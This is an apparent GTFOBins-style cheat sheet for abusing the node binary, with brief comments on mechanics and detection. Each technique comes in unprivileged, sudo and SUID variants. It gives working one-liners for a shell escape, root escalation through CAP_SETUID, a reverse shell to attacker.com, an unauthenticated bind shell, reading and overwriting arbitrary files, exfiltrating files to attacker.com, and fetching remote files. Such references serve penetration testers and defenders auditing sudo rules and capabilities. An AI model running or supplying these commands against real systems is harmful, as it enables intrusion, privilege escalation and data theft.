This executable (node) can spawn an interactive system shell.
This function can be performed by any unprivileged user.
# Starts /bin/sh as a child of node. stdio [0, 1, 2] shares node's own stdin,
# stdout and stderr with the child, which is what makes the shell interactive.
# In process telemetry this appears as a `node -e` process whose child is /bin/sh.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
# Same script as the unprivileged form: it never changes user, so /bin/sh
# inherits whatever identity node was started with. A sudoers entry that allows
# node is therefore equivalent to allowing a shell as the sudo target user.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
# Differs from the plain form only by the ["-p"] argument passed to /bin/sh.
# In bash and dash, -p keeps the effective UID instead of resetting it to the
# real UID, so the shell retains the identity given by the SUID bit on node.
# NOTE(review): the effect of -p depends on which shell /bin/sh is on the host.
node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'
This function runs with the usual kernel permission checks bypassed if the executable has certain capabilities set.
The following capabilities are needed: CAP_SETUID.
# process.setuid(0) switches the node process to UID 0 before the shell is
# spawned; that call is the step that needs CAP_SETUID. Audit point: the file
# capabilities on the node binary (as listed by getcap) should not include
# cap_setuid.
node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
This executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
# Spawns /bin/sh with piped stdio, then opens an outbound TCP connection to
# attacker.com port 12345. Inside the connect callback `this` is the socket:
# socket data feeds the shell's stdin, and the shell's stdout and stderr are
# written back to the socket. The script uses plain TCP with no TLS.
# Detection surface: a node process with a /bin/sh child and an outbound
# connection.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").connect(12345, "attacker.com", function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
})'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
# Same script as the unprivileged form; nothing in it changes user, so the
# /bin/sh child runs as the user node was started as (the sudo target user).
# The connect callback pipes the socket into the shell's stdin and the shell's
# stdout and stderr back into the socket.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").connect(12345, "attacker.com", function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
})'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
# Differs from the plain form only by the ["-p"] argument passed to /bin/sh.
# In bash and dash, -p keeps the effective UID instead of resetting it to the
# real UID, so the shell retains the identity given by the SUID bit on node.
# The connect callback pipes the socket into the shell's stdin and the shell's
# stdout and stderr back into the socket.
node -e 'sh = require("child_process").spawn("/bin/sh", ["-p"]);
require("net").connect(12345, "attacker.com", function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
})'
This executable can bind a system shell to a local port waiting for an attacker to connect.
This function can be performed by any unprivileged user.
# Spawns a single /bin/sh, then listens on TCP port 12345. Every accepted
# client is piped to that one shell's stdin and receives its stdout and stderr.
# listen(12345) passes no host, so the listener is not restricted to loopback,
# and nothing in the script authenticates the client. Detection surface: a
# node process holding a new listening socket with /bin/sh as its child.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(12345)'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
# Same script as the unprivileged form; nothing in it changes user, so the
# /bin/sh child runs as the user node was started as (the sudo target user).
# The server listens on TCP port 12345 with no host argument and pipes each
# accepted client to the shell's stdin, stdout and stderr.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(12345)'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
# Differs from the plain form only by the ["-p"] argument passed to /bin/sh.
# In bash and dash, -p keeps the effective UID instead of resetting it to the
# real UID, so the shell retains the identity given by the SUID bit on node.
# The server listens on TCP port 12345 with no host argument and pipes each
# accepted client to the shell's stdin, stdout and stderr.
node -e 'sh = require("child_process").spawn("/bin/sh", ["-p"]);
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(12345)'
This executable can write data to local files.
This function can be performed by any unprivileged user.
# Writes the string "DATA" to the given path with fs.writeFileSync. No flag is
# passed, so Node's default applies: the file is created if missing and its
# existing contents are replaced. The write is subject to the file permissions
# of the user running node.
node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
# Same script as the unprivileged form; it never changes user, so the write is
# done as the user node was started as. A sudoers entry that allows node
# therefore allows replacing any file the sudo target user can write.
node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
# Same script as the unprivileged form. With the SUID bit set on node, the
# write is checked against node's effective UID rather than the invoking
# user's, so it can replace files the invoking user could not write.
node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'
This executable can read data from local files.
This function can be performed by any unprivileged user.
# Reads the whole file with fs.readFileSync (no encoding given, so the result
# is a raw Buffer) and writes those bytes to node's stdout. The read is subject
# to the file permissions of the user running node.
node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
# Same script as the unprivileged form; it never changes user, so the read is
# done as the user node was started as. A sudoers entry that allows node
# therefore exposes every file the sudo target user can read.
node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
# Same script as the unprivileged form. With the SUID bit set on node, the
# read is checked against node's effective UID rather than the invoking
# user's, so it can return files the invoking user could not read.
node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'
This executable can upload local data.
This function can be performed by any unprivileged user.
# Streams the local file into the body of an HTTP request to the given URL.
# The URL scheme is http, so the file content crosses the network unencrypted
# and is visible to network inspection. Detection surface: a `node -e` process
# opening a local file and an outbound HTTP connection.
node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
# Same script as the unprivileged form; it never changes user, so the file is
# opened as the user node was started as (the sudo target user) before being
# streamed into the outbound HTTP request.
node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
# Same script as the unprivileged form. With the SUID bit set on node, the
# file is opened under node's effective UID rather than the invoking user's
# before being streamed into the outbound HTTP request.
node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'
This executable can download remote data.
This function can be performed by any unprivileged user.
# Fetches the URL over plain HTTP and streams the response body into the
# output path. The callback does not look at the status code, so whatever body
# the server returns is written. Detection surface: a `node -e` process making
# an outbound HTTP request and creating a local file.
node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
# Same script as the unprivileged form; it never changes user, so the output
# file is created as the user node was started as (the sudo target user), with
# content supplied by the remote server over plain HTTP.
node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
# Same script as the unprivileged form. With the SUID bit set on node, the
# output file is written under node's effective UID rather than the invoking
# user's, with content supplied by the remote server over plain HTTP.
node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'